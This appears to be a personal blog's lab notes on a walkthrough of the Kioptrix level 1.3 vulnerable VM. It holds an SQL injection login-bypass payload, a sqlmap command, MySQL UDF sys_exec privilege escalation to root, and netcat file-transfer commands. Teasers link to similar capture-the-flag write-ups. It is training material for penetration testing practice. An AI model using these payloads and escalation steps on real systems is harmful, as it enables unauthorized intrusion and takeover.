Skip to main content

VMW- Kioptix level 1.4 UDF. Running o/s cmds from SQL

Walkthru @ 1. http://www.gcura.tech/kioptrix-level-1-3-4/


  1. Ports : 22,80,139 and 445

  • OpenSSH v4.7p1
  • Port 80 with Apache 2.2.8 / PHP/5.2.4 with Suhosin-Patch
  • Samba 3.0.28a
  • Linux 2.6.9 – 2.6.33

  1. URL appears to be SQL vulnerable to an SQL injection by putting a comma ' in the username and password fields
    1. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:
SELECT * FROM users where username='john' and password='1' or '1'='1'
  1. Also works if we use admin' or '1'='1 as password

  1. sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL --data="myusername=username&mypassword=password" --level=5 --risk=3 --dbs
From <http://www.gcura.tech/kioptrix-level-1-3-4/>
Didn’t work for me.





  1. ps -ef | grep root : to list all the processes.
Note the use of the -e option to display all processes, and -f to display the full format. Another useful option is -u, which allows you to filter the processes displayed by user ID. For example, to display all the processes owned by the user root, run a command like this:
$ ps -u root -o user,pid,cpu,cmd
USER       PID   CPU CMD
root         1   -   /usr/lib/systemd/systemd --switched-root --system --deserialize 24
root         2   -   [kthreadd]
root         4   -   [kworker/0:0H]
root         6   -   [mm_percpu_wq]
root         7   -   [ksoftirqd/0]

  1. I can see that MySQL is running with root privileges. Since I have ssh access to the machine lets see if I find the database credentials by accessing the configuration files.
What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions.  [Looked up these tutorials which helped me out with understanding MySQL UDF more. MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF] or [http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html]
$ whereis lib_mysqludf_sys.so
  1. mysql> select sys_exec('usermod -a -G admin john');
  2. Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.
  3. This pc has netcat if you need to copy linuxprivchecker file. I couldn’t wget it from Kali. It would connect to the server and not download it.
On the receiving end running, it will begin listening on port 1234.
>nc -l -p 1234 > out.file
On the sending end running,
>nc -w 3 [destination] 1234 < out.file

Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more